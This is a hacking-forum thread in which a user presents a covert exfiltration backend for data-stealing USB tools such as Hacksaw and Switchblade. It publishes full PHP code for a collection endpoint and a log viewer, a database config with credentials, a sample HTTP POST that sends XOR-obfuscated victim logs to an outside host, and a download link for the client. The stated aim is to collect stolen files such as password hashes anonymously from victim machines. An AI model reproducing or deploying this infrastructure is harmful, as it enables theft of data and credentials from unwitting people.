Jump to content

Alternative Method Of Recieving Remote Data


Steve8x
 Share

Which Method Is Preferable To You?  

3 members have voted

  1. 1. Which is your favorite of these three? Emailing, FTPing or PHP+MYSQLing !! ;)

    • HTTP + PHP + MYSQL
      2
    • FTP
      0
    • Email
      1


Recommended Posts

OK well I've never used a hacksaw or a switchblade(since I prefer to create my own apps)

Anyways from what I've gathered your hack/blade uses gmail to receive the log files...

This is bad because your having to leave your EMAIL and PASSWORD on a remote machine... and I know gmail at least back when I made an account requires that you have a cell phone to create an account so its not like you can make that many!

I was using FTP at first! for my app, but I still didn't like having to leave a username + password contained within the software!

Here is my better, safer, anonymous method of getting your data. One day I was writing a post here on hak5 when it hit me!

[CLIENT ON REMOTE MACHINE]->FREE WEBSERVER->PHP->MYSQL DATABASE

Think about what I'm doing right now, I'm typing text into a box and when I click the "Post" button the php page that this form data gets submitted to inserts my post into the database... When you have seen my topic and clicked on my post the text I have posted was fetched from database and the HTML code was dynamically created by the php for your viewing pleasure...

We(non hak5 admins) have no way knowing the MYSQL database password, and there isn't a reason for us to have it either, we can post data to the database without it...

I have created a sample app, which can be modified for your needs... I'm sure you could get it to post your LM hash files or whatever files switch/saw saves to your database!

Heres what you need... Find a free web provider which offers PHP and at least 1 MYSQL database also for free! If you can't find one that offers mysql you could run your own MYSQL database server, and find a free host with php and you could still keep your mysql password hidden... Because of the way PHP works, its server sided, you cannot see the php code, only the html code generated by it!

THATS IT! Once you've got that setup your ready to receive your data! make the password a good strong password and change the username from root if you can...

I had to do a little research on HTTP protocol, and also I used a packet sniffer and attached it to firefox, while I submitted a form on a website...

My example program is called "SwiftSubmit" it lets you type up to 8000 characters into the box and once you click submit it sends a packet like this to the host you want it to connect to

this is all anyone sniffing packets will see, where its going and other info, but the 'log' data is scrambled!

POST /sendmeyourpackets/index.php HTTP/1.1
Host: popeax.com..
User-Agent: Mozilla/5.0 (Windows; U;
Windows NT 5.1; en-US rv:1.9.0.1) 
Gecko/2008070208 Firefox/3.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate..Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
connection: keep-alive
Referer: http://localhost/pwned.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 346

name=Liz7783&log=.!HuMJUFQL@HPKBH.OJUFQL@[cut]

Heres a picture of it, also with the nice little web front in the background I made for it to decode, decrypt and view the logs in the database...

phpSwift.png

as you can see from this picture below of MySQL Query Browser, the data is encrypted in the database itself...

encrypteddata.png

If your wondering about the names, I like to name all my computers as well as log their IP, it just makes it easier for me... the software randomly chooses a name for the computer its run on

Source Code + Binary

http://popeax.com/sendmeyourpackets/SwiftSubmit.zip

go ahead and test it out on my web server! I can kind of have my own little hak5 wall goin' lol!

you can login to the webfront and see if anyone posted, or see if your post worked!

http://popeax.com/sendmeyourpackets/viewlogs.php -> user: root, password: 1337

SOURCE:

<?php
include('config.php');

if(isset($_POST['auth']))
{
    $user = $_POST['user'];
    $pass = $_POST['pword'];

    $logininfo = "$user-$pass";

    setcookie("chocolatechipcookie", $logininfo, time()+1200); // 1200 = 20 minutes

    echo "<meta http-equiv='refresh' content='0;url=$Self'>";
}

if(isset($_COOKIE['chocolatechipcookie'])) // every time you refresh the page you'll stay logged in for 20 minutes
{
    $logininfo = $_COOKIE['chocolatechipcookie'];    
    setcookie("chocolatechipcookie", $logininfo, time()+1200);
}

?>

<html>
<head>
<title>Log Viewer v1.0 - by Steve8x</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<center>

<?php

//must change these to be secure so no one can read your logs but you
$USER = "root";
$PASSWORD = "1337";

//very similar to my c++ version
function XORbuffer($buffer, $password)
{
    $passlength = strlen($password);
    $bufflength = strlen($buffer);
    $x = 0;
    
    for($i = 0; $i < $bufflength; $i++)
    {
        if($x == $passlength)
        {
            $x = 0;
        }

        $buffer[$i] = $buffer[$i] ^ $password[$x];
        $x++;
    }
    
    return $buffer;
}

//if no cookie is set, then show the login page
if(!isset($_COOKIE['chocolatechipcookie']))
{
    echo "<h1> Admin Login: </h1>";
    echo "<p><form method='post' action='$Self'>";
    echo "<table border='2' cellspacing='2' cellpadding='0'><tr>";
    echo "<td>Username: </td><td> <input name='user' type='text' id='user'> </td> </tr>";
    echo "<td>Password: </td><td> <input name='pword' type='password' id='pword'></td></tr> </table>";
    echo "<p> <input type='submit' name='auth' id='auth' value='Login'>";
    echo "</form>";
    die();
}
else
{
    //otherwise validate the username and password stored in the cookie!
    $logininfo = $_COOKIE['chocolatechipcookie'];
    list($usr, $pass) = split('-', $logininfo);
    
    
    //If you enter the wrong username or password you'll have to clear your cookies in your browser
    //its made that way as an annoyance to deter someone from attempting to guess
    // HOWEVER they shouldn't know about your page anyway...    
    if($usr != $USER)
    {
        die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>");
    }
    if($pass != $PASSWORD)
    {
        die("<h1>INVALID CREDENTIALS!!! FUCK OFF!!</h1>");
    }
    
    echo "<form method=\"post\" action=\"$Self\">";
    echo "<input type=\"submit\" name=\"save\" id=\"save\" value=\"Save Logs To File!\"><p>";
    echo "</form>";


    //lets fetch that data from the database!
    $query = "SELECT * FROM data";
    $result = mysql_query($query);
    
    if(isset($_POST['save']))
    {
        $savefile = 1;
        $file = fopen("savedlogs.txt", "w");
    }


    echo "<table border='1' cellspacing='1' cellpadding='1'>";
    echo "<tr><th>ID</th><th>Name</th><th>IP</th><th>LOG</th></tr>";

    while($row = mysql_fetch_array($result))
    {
        $id = $row[0];
        $name = $row[1];
        $ip = $row[2];
        $log = $row[3];

        //change the password "hak5liverocks" here and also in your c++ program
        //they have to match so that this page can properly decrypt the stored data
        //the data is always stored encrypted in the database...
        //its only decrypted when you want to view it!
        //or save it to a text file

        $decoded = urldecode($log);
        $decrypted = XORbuffer($decoded, "hak5liverocks");

        if($savefile == 1)
        {
            $preparedstring = "name-> $name ip-> $ip log-> $decrypted\r\n";
            fwrite($file, $preparedstring);
        }
        
        echo "<tr><td>";
        echo "$id";
        echo "</td><td>";
        echo "$name";
        echo "</td><td>";
        echo "$ip";
        echo "</td><td>";
        echo "$decrypted";
        echo "</td></tr";
    }

    if($savefile == 1)
        fclose($file);
        
    echo "</table>";
}

?>

http://popeax.com/sendmeyourpackets/index.php

SOURCE:

<?php

include ('config.php');

if(isset($_POST['name'])) // these means our little program is sending us data :)
{
    $ip = $_SERVER['REMOTE_ADDR'];
    $name = $_POST['name'];
    $log = $_POST['log'];
    
    $name = mysql_real_escape_string($name);
    $log = mysql_real_escape_string($log);
    
    //insert the encrypted + minimally encoded data into the database!
    $query = "INSERT INTO data (name, ip, log) VALUES ('$name', '$ip', '$log')";
    mysql_query($query);
    
}
else // otherwise someones just looking at the page
{
    echo "<center><h1>You Got PWNED!</h1><img src=\"pwned.jpg\"></center>";
}

// the \" are to escape the quotes! in this case you could of also just used single quotes ' '
// but thats not always the case so its good to know how to escape characters!


?>

config.php

SOURCE:

<?php

$dbhost = 'localhost:3306';
$dbuser = 'nottellingyou';
$dbpass = 'hak5liverocks';
$dbname = 'collecteddata';
$Self = $_SERVER['PHP_SELF'];

$conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('Error connecting to mysql');

$query = "CREATE DATABASE IF NOT EXISTS collecteddata"; // creates database for you if it doesnt exist yet
$result = mysql_query($query);

mysql_select_db($dbname);

$query = "CREATE TABLE IF NOT EXISTS data(id INT NOT NULL AUTO_INCREMENT, name VARCHAR(30) NOT NULL, ip VARCHAR(30) NOT NULL, log VARCHAR(8000) NOT NULL, PRIMARY KEY(id))"; // create table if not existant
mysql_query($query);

?>

Oh and the XOR encryption used is slightly better than what ive shown before in other topics... instead of XORing EACH byte of the buffer with EACH character of the password. I only xor each SUCCESSIVE character of the buffer which each SUCCESSIVE character of the password. This makes it way more secure, the previous method reduced the 'password' to only 1 character, this now requires all characters of the password so the plain text can be revealed

well what do you think should I keep the encryption? or just go with encoding? With the encryption not all characters seem to come out exactly the same as when posted, there's something not quite right...

thats not a big deal for text data, but as you can imagine for binary data or something where every single byte has to be right or it'll be messed up, its a problem...

So I'm a little confused on how to get this working 100% smooth. Should I encode then encrypt? or encrypt then encode? lol !!! right now its about 95% just gotta figure out fully the encoding bit, I probably have to encode more chars than just '&' and spaces... thats probably whats messing up some characters sometimes...

I know one problem though that I dealt with the best I could the '&' signs... if you encrypt your data and one of those just so happens to be a resulting character after the encryption, that's going to mess up your posted data, it will stop right there, and no more data will be gotten for that field(because it thinks your declaring data for another field), like "name", "log", etc...

well if anyone is good with encoding+encrypting together let me know, And this thing will have perfect 100% readability... If I removed the encryption and just used encoding all the characters would always be readable but I'd lose the little security provided by it... So I'd rather keep it and figure something out to where the encoding + encrypting can work together! :)

Link to comment
Share on other sites

  • 2 weeks later...

Yeah and if you don't understand those tubes can be filled with your encrypted data, and if they are filled and 'posted' to a web page anywhere on the net, then you can process that data on the web page with php for example. What you do with the data from there is up to you. I choose to store it in a database, as I like that way the best.

Since there are free web hosts which offer php + mysql this makes it an ideal method to use...

Enormous amounts of material, enormous amounts of material!! lol ;)

Link to comment
Share on other sites

  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...